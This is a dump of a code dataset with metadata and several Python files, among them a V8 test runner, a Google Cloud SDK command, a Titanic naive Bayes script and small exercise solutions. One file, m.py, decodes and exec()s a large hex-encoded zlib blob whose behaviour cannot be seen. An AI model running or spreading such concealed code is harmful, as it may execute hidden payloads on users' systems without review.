blob_id stringlengths 40-40 | directory_id stringlengths 40-40 | path stringlengths 5-261 | content_id stringlengths 40-40 | detected_licenses sequencelengths 0-45 | license_type stringclasses 2 values | repo_name stringlengths 8-111 | snapshot_id stringlengths 40-40 | revision_id stringlengths 40-40 | branch_name stringclasses 72 values | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 530k-616M ⌀ | star_events_count int64 0-102k | fork_events_count int64 0-24.6k | gha_license_id stringclasses 9 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 40 values | src_encoding stringclasses 10 values | language stringclasses 1 value | is_vendor bool 1 class | is_generated bool 2 classes | length_bytes int64 11-4.05M | extension stringclasses 25 values | content stringlengths 10-4.04M | authors sequencelengths 1-1 | author_id stringclasses 578 values |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4f659d9fc0303fc1ebfcc69527ae63585c957b79 | e397e996e6ecbda3742980352f8642dfb058fbdb | /src/nodescripts/corenodes/blend/__init__.py | e7c9684c39899c9ddf33aec8b393b96d49b08834 | [
"Apache-2.0"
] | permissive | dephora/GimelStudio | bdcac2155b0021af0a60df4ed4df045a86353ab7 | 0cdaed3ffa93fd735ca8d65a0d99f1be64c2c522 | refs/heads/master | 2023-08-13T02:53:46.269443 | 2021-10-08T15:35:39 | 2021-10-08T15:35:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 72 | py | from .mix_node import MixNode
from .alpha_over_node import AlphaOverNode | [
"[email protected]"
] | |
0b697bf8ee814996d74fb061231aeabb70a184c9 | 70fa6468c768d4ec9b4b14fc94fa785da557f1b5 | /lib/surface/compute/ssl_policies/describe.py | 0546d3f6604bd3a747040e4520dae448783faf92 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | kylewuolle/google-cloud-sdk | d43286ef646aec053ecd7eb58566ab2075e04e76 | 75f09ebe779e99fdc3fd13b48621fe12bfaa11aa | refs/heads/master | 2020-04-20T22:10:41.774132 | 2019-01-26T09:29:26 | 2019-01-26T09:29:26 | 169,131,028 | 0 | 0 | NOASSERTION | 2019-02-04T19:04:40 | 2019-02-04T18:58:36 | Python | UTF-8 | Python | false | false | 2,150 | py | # -*- coding: utf-8 -*- #
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Command to describe SSL policies."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.api_lib.compute import base_classes
from googlecloudsdk.api_lib.compute.ssl_policies import ssl_policies_utils
from googlecloudsdk.calliope import base
from googlecloudsdk.command_lib.compute import flags as compute_flags
from googlecloudsdk.command_lib.compute.ssl_policies import flags
_SSL_POLICY_ARG = flags.GetSslPolicyArgument()
class Describe(base.DescribeCommand):
"""Describe a Google Compute Engine ssl policy.
*{command}* is used to display all data associated with a Google Compute
Engine SSL policy in a project.
An SSL policy specifies the server-side support for SSL features. An SSL
policy can be attached to a TargetHttpsProxy or a TargetSslProxy. This affects
connections between clients and the HTTPS or SSL proxy load balancer. SSL
policies do not affect the connection between the load balancers and the
backends.
"""
@staticmethod
def Args(parser):
_SSL_POLICY_ARG.AddArgument(parser, operation_type='describe')
def Run(self, args):
"""Issues the request to describe a SSL policy."""
holder = base_classes.ComputeApiHolder(self.ReleaseTrack())
helper = ssl_policies_utils.SslPolicyHelper(holder)
ref = _SSL_POLICY_ARG.ResolveAsResource(
args,
holder.resources,
scope_lister=compute_flags.GetDefaultScopeLister(holder.client))
return helper.Describe(ref)
| [
"[email protected]"
] | |
6dd2391b1a566786d194913b72e160c7c445f124 | 79f6873839b54a21dff11ceeef5160e7b9330864 | /Project Euler/009.py | 4ebd2beb7a9bb309da5bd351727beba8a2474343 | [] | no_license | paperwraith/Project_Euler | 45c0890a8e42d0277712da8289972c4d2542c663 | 07d27231f0137bee0b419e5474173ef086ae529e | refs/heads/main | 2023-08-11T14:10:39.373972 | 2021-09-25T23:11:42 | 2021-09-25T23:11:42 | 410,400,150 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | # A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,
# a^2 + b^2 = c^2
# For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.
# There exists exactly one Pythagorean triplet for which a + b + c = 1000.
# Find the product abc.
# TODO:
# Generate Triples
# Check if sum of triples equals 1000
def triple_gen():
m = 2
n = 1
| [
"[email protected]"
] | |
1433ed9a66cf8f030d0107507d432670a7d51f0f | 58baf0dd6a9aa51ef5a7cf4b0ee74c9cb0d2030f | /tools/testrunner/standard_runner.py | a59fe0839665fe1699fff41e3e9e4b837c952af2 | [
"bzip2-1.0.6",
"BSD-3-Clause",
"SunPro"
] | permissive | eachLee/v8 | cce8d6e620625c97a2e969ee8a52cc5eb77444ce | 1abeb0caa21301f5ace7177711c4f09f2d6447d9 | refs/heads/master | 2021-08-14T08:21:44.549890 | 2017-11-14T20:35:38 | 2017-11-14T23:06:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 21,667 | py | #!/usr/bin/env python
#
# Copyright 2017 the V8 project authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from collections import OrderedDict
from os.path import join
import multiprocessing
import os
import random
import shlex
import subprocess
import sys
import time
# Adds testrunner to the path hence it has to be imported at the beginning.
import base_runner
from testrunner.local import execution
from testrunner.local import progress
from testrunner.local import testsuite
from testrunner.local import utils
from testrunner.local import verbose
from testrunner.local.variants import ALL_VARIANTS
from testrunner.objects import context
TIMEOUT_DEFAULT = 60
# Variants ordered by expected runtime (slowest first).
VARIANTS = ["default"]
MORE_VARIANTS = [
"stress",
"stress_incremental_marking",
"nooptimization",
"stress_asm_wasm",
"wasm_traps",
]
EXHAUSTIVE_VARIANTS = MORE_VARIANTS + VARIANTS
VARIANT_ALIASES = {
# The default for developer workstations.
"dev": VARIANTS,
# Additional variants, run on all bots.
"more": MORE_VARIANTS,
# TODO(machenbach): Deprecate this after the step is removed on infra side.
# Additional variants, run on a subset of bots.
"extra": [],
}
GC_STRESS_FLAGS = ["--gc-interval=500", "--stress-compaction",
"--concurrent-recompilation-queue-length=64",
"--concurrent-recompilation-delay=500",
"--concurrent-recompilation"]
# Double the timeout for these:
SLOW_ARCHS = ["arm",
"mips",
"mipsel",
"mips64",
"mips64el",
"s390",
"s390x",
"arm64"]
class StandardTestRunner(base_runner.BaseTestRunner):
def __init__(self):
super(StandardTestRunner, self).__init__()
self.sancov_dir = None
def _do_execute(self, options, args):
if options.swarming:
# Swarming doesn't print how isolated commands are called. Lets make
# this less cryptic by printing it ourselves.
print ' '.join(sys.argv)
if utils.GuessOS() == "macos":
# TODO(machenbach): Temporary output for investigating hanging test
# driver on mac.
print "V8 related processes running on this host:"
try:
print subprocess.check_output(
"ps -e | egrep 'd8|cctest|unittests'", shell=True)
except Exception:
pass
suite_paths = utils.GetSuitePaths(join(base_runner.BASE_DIR, "test"))
# Use default tests if no test configuration was provided at the cmd line.
if len(args) == 0:
args = ["default"]
# Expand arguments with grouped tests. The args should reflect the list
# of suites as otherwise filters would break.
def ExpandTestGroups(name):
if name in base_runner.TEST_MAP:
return [suite for suite in base_runner.TEST_MAP[name]]
else:
return [name]
args = reduce(lambda x, y: x + y,
[ExpandTestGroups(arg) for arg in args],
[])
args_suites = OrderedDict() # Used as set
for arg in args:
args_suites[arg.split('/')[0]] = True
suite_paths = [ s for s in args_suites if s in suite_paths ]
suites = []
for root in suite_paths:
suite = testsuite.TestSuite.LoadTestSuite(
os.path.join(base_runner.BASE_DIR, "test", root))
if suite:
suites.append(suite)
for s in suites:
s.PrepareSources()
try:
return self._execute(args, options, suites)
except KeyboardInterrupt:
return 2
def _add_parser_options(self, parser):
parser.add_option("--sancov-dir",
help="Directory where to collect coverage data")
parser.add_option("--cfi-vptr",
help="Run tests with UBSAN cfi_vptr option.",
default=False, action="store_true")
parser.add_option("--novfp3",
help="Indicates that V8 was compiled without VFP3"
" support",
default=False, action="store_true")
parser.add_option("--cat", help="Print the source of the tests",
default=False, action="store_true")
parser.add_option("--slow-tests",
help="Regard slow tests (run|skip|dontcare)",
default="dontcare")
parser.add_option("--pass-fail-tests",
help="Regard pass|fail tests (run|skip|dontcare)",
default="dontcare")
parser.add_option("--gc-stress",
help="Switch on GC stress mode",
default=False, action="store_true")
parser.add_option("--command-prefix",
help="Prepended to each shell command used to run a"
" test",
default="")
parser.add_option("--extra-flags",
help="Additional flags to pass to each test command",
action="append", default=[])
parser.add_option("--isolates", help="Whether to test isolates",
default=False, action="store_true")
parser.add_option("-j", help="The number of parallel tasks to run",
default=0, type="int")
parser.add_option("--no-harness", "--noharness",
help="Run without test harness of a given suite",
default=False, action="store_true")
parser.add_option("--no-presubmit", "--nopresubmit",
help='Skip presubmit checks (deprecated)',
default=False, dest="no_presubmit", action="store_true")
parser.add_option("--no-sorting", "--nosorting",
help="Don't sort tests according to duration of last"
" run.",
default=False, dest="no_sorting", action="store_true")
parser.add_option("--no-variants", "--novariants",
help="Don't run any testing variants",
default=False, dest="no_variants", action="store_true")
parser.add_option("--variants",
help="Comma-separated list of testing variants;"
" default: \"%s\"" % ",".join(VARIANTS))
parser.add_option("--exhaustive-variants",
default=False, action="store_true",
help="Use exhaustive set of default variants:"
" \"%s\"" % ",".join(EXHAUSTIVE_VARIANTS))
parser.add_option("-p", "--progress",
help=("The style of progress indicator"
" (verbose, dots, color, mono)"),
choices=progress.PROGRESS_INDICATORS.keys(),
default="mono")
parser.add_option("--quickcheck", default=False, action="store_true",
help=("Quick check mode (skip slow tests)"))
parser.add_option("--report", help="Print a summary of the tests to be"
" run",
default=False, action="store_true")
parser.add_option("--json-test-results",
help="Path to a file for storing json results.")
parser.add_option("--flakiness-results",
help="Path to a file for storing flakiness json.")
parser.add_option("--rerun-failures-count",
help=("Number of times to rerun each failing test case."
" Very slow tests will be rerun only once."),
default=0, type="int")
parser.add_option("--rerun-failures-max",
help="Maximum number of failing test cases to rerun.",
default=100, type="int")
parser.add_option("--shard-count",
help="Split testsuites into this number of shards",
default=1, type="int")
parser.add_option("--shard-run",
help="Run this shard from the split up tests.",
default=1, type="int")
parser.add_option("--dont-skip-slow-simulator-tests",
help="Don't skip more slow tests when using a"
" simulator.",
default=False, action="store_true",
dest="dont_skip_simulator_slow_tests")
parser.add_option("--swarming",
help="Indicates running test driver on swarming.",
default=False, action="store_true")
parser.add_option("--time", help="Print timing information after running",
default=False, action="store_true")
parser.add_option("-t", "--timeout", help="Timeout in seconds",
default=TIMEOUT_DEFAULT, type="int")
parser.add_option("--warn-unused", help="Report unused rules",
default=False, action="store_true")
parser.add_option("--junitout", help="File name of the JUnit output")
parser.add_option("--junittestsuite",
help="The testsuite name in the JUnit output file",
default="v8tests")
parser.add_option("--random-seed", default=0, dest="random_seed",
help="Default seed for initializing random generator",
type=int)
parser.add_option("--random-seed-stress-count", default=1, type="int",
dest="random_seed_stress_count",
help="Number of runs with different random seeds")
def _process_options(self, options):
global VARIANTS
if options.sancov_dir:
self.sancov_dir = options.sancov_dir
if not os.path.exists(self.sancov_dir):
print("sancov-dir %s doesn't exist" % self.sancov_dir)
raise base_runner.TestRunnerError()
options.command_prefix = shlex.split(options.command_prefix)
options.extra_flags = sum(map(shlex.split, options.extra_flags), [])
if options.gc_stress:
options.extra_flags += GC_STRESS_FLAGS
if self.build_config.asan:
options.extra_flags.append("--invoke-weak-callbacks")
options.extra_flags.append("--omit-quit")
if options.novfp3:
options.extra_flags.append("--noenable-vfp3")
if options.exhaustive_variants:
# This is used on many bots. It includes a larger set of default
# variants.
# Other options for manipulating variants still apply afterwards.
VARIANTS = EXHAUSTIVE_VARIANTS
# TODO(machenbach): Figure out how to test a bigger subset of variants on
# msan.
if self.build_config.msan:
VARIANTS = ["default"]
if options.j == 0:
options.j = multiprocessing.cpu_count()
if options.random_seed_stress_count <= 1 and options.random_seed == 0:
options.random_seed = self._random_seed()
def excl(*args):
"""Returns true if zero or one of multiple arguments are true."""
return reduce(lambda x, y: x + y, args) <= 1
if not excl(options.no_variants, bool(options.variants)):
print("Use only one of --no-variants or --variants.")
raise base_runner.TestRunnerError()
if options.quickcheck:
VARIANTS = ["default", "stress"]
options.slow_tests = "skip"
options.pass_fail_tests = "skip"
if options.no_variants:
VARIANTS = ["default"]
if options.variants:
VARIANTS = options.variants.split(",")
# Resolve variant aliases.
VARIANTS = reduce(
list.__add__,
(VARIANT_ALIASES.get(v, [v]) for v in VARIANTS),
[],
)
if not set(VARIANTS).issubset(ALL_VARIANTS):
print "All variants must be in %s" % str(ALL_VARIANTS)
raise base_runner.TestRunnerError()
if self.build_config.predictable:
VARIANTS = ["default"]
options.extra_flags.append("--predictable")
options.extra_flags.append("--verify_predictable")
options.extra_flags.append("--no-inline-new")
# Dedupe.
VARIANTS = list(set(VARIANTS))
def CheckTestMode(name, option):
if not option in ["run", "skip", "dontcare"]:
print "Unknown %s mode %s" % (name, option)
raise base_runner.TestRunnerError()
CheckTestMode("slow test", options.slow_tests)
CheckTestMode("pass|fail test", options.pass_fail_tests)
if self.build_config.no_i18n:
base_runner.TEST_MAP["bot_default"].remove("intl")
base_runner.TEST_MAP["default"].remove("intl")
def _setup_env(self):
super(StandardTestRunner, self)._setup_env()
symbolizer_option = self._get_external_symbolizer_option()
if self.sancov_dir:
os.environ['ASAN_OPTIONS'] = ":".join([
'coverage=1',
'coverage_dir=%s' % self.sancov_dir,
symbolizer_option,
"allow_user_segv_handler=1",
])
def _random_seed(self):
seed = 0
while not seed:
seed = random.SystemRandom().randint(-2147483648, 2147483647)
return seed
def _execute(self, args, options, suites):
print(">>> Running tests for %s.%s" % (self.build_config.arch,
self.mode_name))
# Populate context object.
# Simulators are slow, therefore allow a longer timeout.
if self.build_config.arch in SLOW_ARCHS:
options.timeout *= 2
options.timeout *= self.mode_options.timeout_scalefactor
if self.build_config.predictable:
# Predictable mode is slower.
options.timeout *= 2
ctx = context.Context(self.build_config.arch,
self.mode_options.execution_mode,
self.outdir,
self.mode_options.flags,
options.verbose,
options.timeout,
options.isolates,
options.command_prefix,
options.extra_flags,
self.build_config.no_i18n,
options.random_seed,
options.no_sorting,
options.rerun_failures_count,
options.rerun_failures_max,
self.build_config.predictable,
options.no_harness,
use_perf_data=not options.swarming,
sancov_dir=self.sancov_dir)
# TODO(all): Combine "simulator" and "simulator_run".
# TODO(machenbach): In GN we can derive simulator run from
# target_arch != v8_target_arch in the dumped build config.
simulator_run = (
not options.dont_skip_simulator_slow_tests and
self.build_config.arch in [
'arm64', 'arm', 'mipsel', 'mips', 'mips64', 'mips64el', 'ppc',
'ppc64', 's390', 's390x'] and
bool(base_runner.ARCH_GUESS) and
self.build_config.arch != base_runner.ARCH_GUESS)
# Find available test suites and read test cases from them.
variables = {
"arch": self.build_config.arch,
"asan": self.build_config.asan,
"byteorder": sys.byteorder,
"dcheck_always_on": self.build_config.dcheck_always_on,
"deopt_fuzzer": False,
"gc_fuzzer": False,
"gc_stress": options.gc_stress,
"gcov_coverage": self.build_config.gcov_coverage,
"isolates": options.isolates,
"mode": self.mode_options.status_mode,
"msan": self.build_config.msan,
"no_harness": options.no_harness,
"no_i18n": self.build_config.no_i18n,
"no_snap": self.build_config.no_snap,
"novfp3": options.novfp3,
"predictable": self.build_config.predictable,
"simulator": utils.UseSimulator(self.build_config.arch),
"simulator_run": simulator_run,
"system": utils.GuessOS(),
"tsan": self.build_config.tsan,
"ubsan_vptr": self.build_config.ubsan_vptr,
}
all_tests = []
num_tests = 0
for s in suites:
s.ReadStatusFile(variables)
s.ReadTestCases(ctx)
if len(args) > 0:
s.FilterTestCasesByArgs(args)
all_tests += s.tests
# First filtering by status applying the generic rules (independent of
# variants).
s.FilterTestCasesByStatus(options.warn_unused, options.slow_tests,
options.pass_fail_tests)
if options.cat:
verbose.PrintTestSource(s.tests)
continue
variant_gen = s.CreateVariantGenerator(VARIANTS)
variant_tests = [ t.CopyAddingFlags(v, flags)
for t in s.tests
for v in variant_gen.FilterVariantsByTest(t)
for flags in variant_gen.GetFlagSets(t, v) ]
if options.random_seed_stress_count > 1:
# Duplicate test for random seed stress mode.
def iter_seed_flags():
for _ in range(0, options.random_seed_stress_count):
# Use given random seed for all runs (set by default in
# execution.py) or a new random seed if none is specified.
if options.random_seed:
yield []
else:
yield ["--random-seed=%d" % self._random_seed()]
s.tests = [
t.CopyAddingFlags(t.variant, flags)
for t in variant_tests
for flags in iter_seed_flags()
]
else:
s.tests = variant_tests
# Second filtering by status applying the variant-dependent rules.
s.FilterTestCasesByStatus(options.warn_unused, options.slow_tests,
options.pass_fail_tests, variants=True)
s.tests = self._shard_tests(s.tests, options)
num_tests += len(s.tests)
if options.cat:
return 0 # We're done here.
if options.report:
verbose.PrintReport(all_tests)
# Run the tests.
start_time = time.time()
progress_indicator = progress.IndicatorNotifier()
progress_indicator.Register(
progress.PROGRESS_INDICATORS[options.progress]())
if options.junitout:
progress_indicator.Register(progress.JUnitTestProgressIndicator(
options.junitout, options.junittestsuite))
if options.json_test_results:
progress_indicator.Register(progress.JsonTestProgressIndicator(
options.json_test_results,
self.build_config.arch,
self.mode_options.execution_mode,
ctx.random_seed))
if options.flakiness_results:
progress_indicator.Register(progress.FlakinessTestProgressIndicator(
options.flakiness_results))
runner = execution.Runner(suites, progress_indicator, ctx)
exit_code = runner.Run(options.j)
overall_duration = time.time() - start_time
if options.time:
verbose.PrintTestDurations(suites, overall_duration)
if num_tests == 0:
print("Warning: no tests were run!")
if exit_code == 1 and options.json_test_results:
print("Force exit code 0 after failures. Json test results file "
"generated with failure information.")
exit_code = 0
if self.sancov_dir:
# If tests ran with sanitizer coverage, merge coverage files in the end.
try:
print "Merging sancov files."
subprocess.check_call([
sys.executable,
join(
base_runner.BASE_DIR, "tools", "sanitizers", "sancov_merger.py"),
"--coverage-dir=%s" % self.sancov_dir])
except:
print >> sys.stderr, "Error: Merging sancov files failed."
exit_code = 1
return exit_code
def _shard_tests(self, tests, options):
# Read gtest shard configuration from environment (e.g. set by swarming).
# If none is present, use values passed on the command line.
shard_count = int(
os.environ.get('GTEST_TOTAL_SHARDS', options.shard_count))
shard_run = os.environ.get('GTEST_SHARD_INDEX')
if shard_run is not None:
# The v8 shard_run starts at 1, while GTEST_SHARD_INDEX starts at 0.
shard_run = int(shard_run) + 1
else:
shard_run = options.shard_run
if options.shard_count > 1:
# Log if a value was passed on the cmd line and it differs from the
# environment variables.
if options.shard_count != shard_count:
print("shard_count from cmd line differs from environment variable "
"GTEST_TOTAL_SHARDS")
if options.shard_run > 1 and options.shard_run != shard_run:
print("shard_run from cmd line differs from environment variable "
"GTEST_SHARD_INDEX")
if shard_count < 2:
return tests
if shard_run < 1 or shard_run > shard_count:
print "shard-run not a valid number, should be in [1:shard-count]"
print "defaulting back to running all tests"
return tests
count = 0
shard = []
for test in tests:
if count % shard_count == shard_run - 1:
shard.append(test)
count += 1
return shard
if __name__ == '__main__':
sys.exit(StandardTestRunner().execute())
| [
"[email protected]"
] | |
ad8ace3d9d368e692a32a964c2ad9c4e137f94dd | 474b53e2dfbecab16d92fc44e8246b44fa2d840b | /NaiveBayes_Titanic/NaiveBayesTitanic.py | af1366cf7a34b0eeda5db147f20bb21ac4da3be2 | [] | no_license | YYJIANG/classPatternRecognition | db98493b53f28149ad3b828a8e0cd95e6c0e0920 | 093dfd9d0a80abb126e73a8c3de8ff74d3e49699 | refs/heads/main | 2023-08-27T10:40:06.280524 | 2021-10-28T01:23:36 | 2021-10-28T01:23:36 | 413,449,657 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,097 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Oct 4 16:15:26 2021
@author: JYY
"""
import csv
import numpy as np
def dataProcess(filename='train.csv',a=0,b=1,c=4,d=5):
'''读取csv文件'''
train_data = []
with open(filename,'r',newline='') as f:
csvreader = csv.reader(f)
for line in csvreader:
train_data.append(line)
    '''Reassemble the selected features into a matrix. Each row is one passenger; the columns are passenger info (id, survived, sex, age).'''
train = []
male_age = female_age = 0
male_num = female_num = 0
for i in range(len(train_data)-1):
train_row= []
train_row.append(eval(train_data[i+1][a]))
train_row.append(eval(train_data[i+1][b]))
train_row.append(1 if train_data[i+1][c]=='male' else 0)
age = train_data[i+1][d]
if age.isdigit():
train_row.append(eval(age))
if train_row[2] == 1:
male_num += 1
male_age += eval(age)
else:
female_num += 1
female_age += eval(age)
else:
train_row.append(-1)
train.append(train_row)
male_age = male_age/male_num
female_age = female_age/female_num
    '''Age buckets: 0 (0-5), 1 (6-15), 2 (16-25), 3 (26-35), 4 (36-45), 5 (46+); missing ages default to bucket 3'''
for i in range(len(train)):
if train[i][3] == -1:
train[i][3] = 3
elif train[i][3] <=5:
train[i][3] = 0
elif train[i][3] <=15:
train[i][3] =1
elif train[i][3] <= 25:
train[i][3] = 2
elif train[i][3] <=35:
train[i][3] =3
elif train[i][3] <=45:
train[i][3] = 4
else:
train[i][3] = 5
return train
'''Load the training data'''
train = dataProcess('train.csv',0,1,4,5)
'''Compute the prior and conditional probabilities'''
sur = np.zeros(2)
sur_sex = np.zeros([2,2])
sur_age = np.zeros([2,6])
'''dead/alive''' '''dead/alive by sex 0~1''' '''dead/alive by age bucket 0~5'''
for i in range(len(train)):
sur[train[i][1]] += 1
sur_sex[train[i][1]][train[i][2]] += 1
sur_age[train[i][1]][train[i][3]] += 1
sur = sur/sur.sum()
for i in range(2):
sur_sex[i] = sur_sex[i]/sur_sex[i].sum()
sur_age[i] = sur_age[i]/sur_age[i].sum()
print(sur)
print(sur_sex)
print(sur_age)
'''Load the test data'''
test = dataProcess('test.csv',0,0,3,4)
''' '''
pre = []
for i in range(len(test)):
precision_row = [str(test[i][0])]
p_sur_0 = sur[0]*sur_sex[0][test[i][2]]*sur_age[0][test[i][3]]
p_sur_1 = sur[1]*sur_sex[1][test[i][2]]*sur_age[1][test[i][3]]
precision_row.append('0' if p_sur_0 > p_sur_1 else '1')
pre.append(precision_row)
print(pre)
with open('precision.csv','w',newline='') as f:
csvwriter=csv.writer(f)
csvwriter.writerow(['PassengerId','Survived'])
csvwriter.writerows(pre)
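
# For comparison, a hedged sketch of the same classification done with scikit-learn's
# CategoricalNB (not used by this script; shown only as an illustrative alternative,
# assuming scikit-learn is available):
#
# from sklearn.naive_bayes import CategoricalNB
# X_train = [[row[2], row[3]] for row in train]   # sex, age bucket
# y_train = [row[1] for row in train]             # survived
# X_test = [[row[2], row[3]] for row in test]
# clf = CategoricalNB().fit(X_train, y_train)
# predictions = clf.predict(X_test)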
# print(train) | [
"[email protected]"
] | |
c81f32fd9551171eca3f5765147895606e3573ff | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2759/60610/245707.py | 0d1aca295915e41bef3bdf5a5262c94f0f29f52f | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 278 | py | num=input();
for i in range(num):
string=raw_input();
numList=string.split();
count=0
for j in range(int(numList[0]),int(numList[1])+1):
a=int(numList[2]);
b=int(numList[3]);
if (j%a==0) | (j%b==0):
count+=1;
print(count); | [
"[email protected]"
] | |
2af082e346df1acaa0004afb1d856e2c49d3ee69 | 6ac0b1f627976e7fcf69d41b723e155a01d689ce | /m.py | e14330dc53678e40d61224761ef1ec6a03c6b378 | [] | no_license | MrFaxel/Sec | 954ad750284fe6e33e820e6fb8f2a51941c14d3e | bf7746ab6199f8d746a1c6197b44f982aad01224 | refs/heads/master | 2022-12-04T12:32:57.340518 | 2020-09-02T22:41:40 | 2020-09-02T22:41:40 | 292,390,782 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,268 | py | #Compiler par Faxel
#Twitter https://twitter.com/Faxel2020
import zlib , marshal , base64
from base64 import *
exec(zlib.decompress(base64.b16decode('789CCD574B6FE33610BE1BF07F983A073B8B95B3B637ED26410EC576736A4F057A4916022D535E1614A925A9D42E7A29F6984B0BD82850A0A71E8B6C5CF4987FE35FD2A19E9622BF80855B82B0257238CF6F469CA3CF4E22AD4E864C9C8453F34E8A41B371E4C91113E3CBC8F8CE2B7CDD36E0B5A22366346CA55C3B500A7C4DC18B19412823051EBECA11855B0204BE51704526945BBA6F19DCCA48DB1F4E7F845051315274DDF1EFE41489AE883654C197C8A2BB83459F60341B5C8EA5EB5BADE1B2D36AB56E5E0C06D7835717A717FD975F04CBF9FD72F6F372FE71E5E16F9C2B54BD971955323392BA798FBB37A22262F6C1CEF962397FC89E6B44D8E54C0A12AE131133A81311CB4E7F677F268AD688586486FC533CA4D6E72B7FAD11519956D6C3062B904FAECEFCCECE98F33E22625F3D1591B9B0B0BB568475F9D3702481C87F678F89BBAB115FAC44A1421B3FA4363E26F142601DA758D3D44B9136E90DAF7B1783FEEEF82901A9B2585610F6C564A14C1E23EBB70F3B689278EBE32665F6446F59993A4CD682D38638C1F85DA6CFFD1398C3BE385F09D3A2F0670AC00CC619FD0AF6EFCA2B99751B3CB34346D478262F1B39AA0B783F9473655110C45B35CAEC993B35CEC961BFEEA194238F457DAD560BD837CBCAFA6C4DA23578CE9DF309B8E5807948EB4CEFE2CCD698D972FECBFF63FE5656ECD7ECA5175C678F83E0D9B362F96D11A4B3D300E2F115BDA55C8621C54F7AC1EDBC12CEE47200C5D85156AE5A49D3DFFF6BCFE5F38FA4BA1FE6BE7204CE1BDF271EDE9338053DC51B5340810A781F516D98140E12B12094CA80D4CF434E8C2F55D06C8CA80FAEC775E7F8BCD9B0DE673E127405C1E39797D016A69D6EC403B712E69D361E6A1F275B946BBA968A12D53E981F8C9A6676E4C61A16D0E7A84FB21E2A264CA79561A61FC09B091B53E1510D23A64329D89053DD4A4D4B7CD36CD0894743735E5EACE1F77900AFA5F0D93852C4FA1D147D1F314D938B2D6F33A10DE13CDEEBE228B07B23329985FB5A2434CE981A488F818A86533092715C4321F85773684C83FC0097DC23A66ACD618281504295BAB75469B4F6FAC55BD40ADAFDF65A2F16B7EE0C5813667D2B6E4C7D51A8AD09D8366087216297DFDA268368880CE31805955161894A5AA6FECAB938447442BDC8F61BD884684FB1D01414DDBD35A111E3B6D1E1ED9C2F26A521211106CA57CCB4854B607098001D42CA4A614FAA4D40BECF8BCD2A0456009C02DC41FC048114F2CCF6908EE3336E1D3826D3564DF2A58E3C0DEA32C2769611A683546C8C200CE296725F2E855A56A95E1F9C2B184A35A269830B3F55D22D659CBDDA42D4D59CD2B033386412BAAE2DE7AE6B0B7ACB7503C284EBB6D210C4E13818E02A31F1E2521987A6ABE890609D342AA271066C27F5097E77B6D1FAF83D137CBA81CC71C65C0E09DF48A2DFC91F9C043D87CBCF7F0100EAFB80'))) | [
"[email protected]"
] | |
c5c561e0a70c1027a7c149cd7ffb4e4f5bb38d0f | 9a9f31265c65bec0060271cd337580e7b4f3a7e9 | /project/pokupka.py | 81819a11dce3c4e08f65498d21c98238d72d5f98 | [] | no_license | AnatolyDomrachev/1kurs | efaabde4852172b61d3584237611fe19b9faa462 | 84ed0dceb670ec64c958bf1901636a02baf8f533 | refs/heads/master | 2023-02-19T21:42:53.286190 | 2021-01-19T07:41:15 | 2021-01-19T07:41:15 | 292,637,199 | 0 | 1 | null | 2020-09-16T02:29:14 | 2020-09-03T17:32:29 | Python | UTF-8 | Python | false | false | 586 | py | import magazin
import etc
magazin = magazin.Magazin('magazin.conf')
korzina = []
net_v_magazine = []
def pokupka(spisok):
for slovar in spisok:
est_v_mag = 'No'
for tovar in magazin.tovary:
if slovar['name'] == tovar['name']:
kupil = etc.beru(slovar, tovar)
korzina.append(kupil)
est_v_mag = 'Yes'
if est_v_mag == 'No':
            print(slovar, " is not in the store")
    print("Bought: ", korzina)
    print()
    print("Remaining: ", magazin.tovary)
| [
"[email protected]"
] | |
979286ffb46a102ab49df74f8383e498329ab818 | e5eec1428da1d24d3e9b86f5723c51cd2ca636cd | /dynamic_programming/백준/가장큰정사각형_백준.py | 4db92f7d4eee1a5199ea97cc10a52e85fa483fca | [] | no_license | jamwomsoo/Algorithm_prac | 3c36c381f59277721517d331a8f1640399d80c1d | 8393f3cc2f950214c47f3cf0b2c1271791f115d0 | refs/heads/master | 2023-06-09T06:49:14.739255 | 2021-06-18T06:41:01 | 2021-06-18T06:41:01 | 325,227,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 671 | py | # 백준 DP 난이도 골드 5
# 전형적인 dp문제
# dp[i][j]는 위, 왼쪽, 대각선 위 중 작은 것중에 하나를 자신과 더한 값
# -> 정사각형이라면 변의 길이가 모두 같아야하므로
# 1 1 1 1 1 1
# 1 1 1 -> 1 2 2
# 1 1 1 1 2 3
n, m = map(int, input().split())
arr = []
dp = [[0]*(m+1) for _ in range(n+1)]
for i in range(n):
arr.append(list(map(int, input())))
for j in range(m):
dp[i+1][j+1] = arr[i][j]
for i in range(n+1):
for j in range(m+1):
if dp[i][j] != 0:
dp[i][j] += min(dp[i-1][j-1], dp[i][j-1], dp[i-1][j])
res = 0
for row in dp:
res = max(res, max(row))
print(res**2)
| [
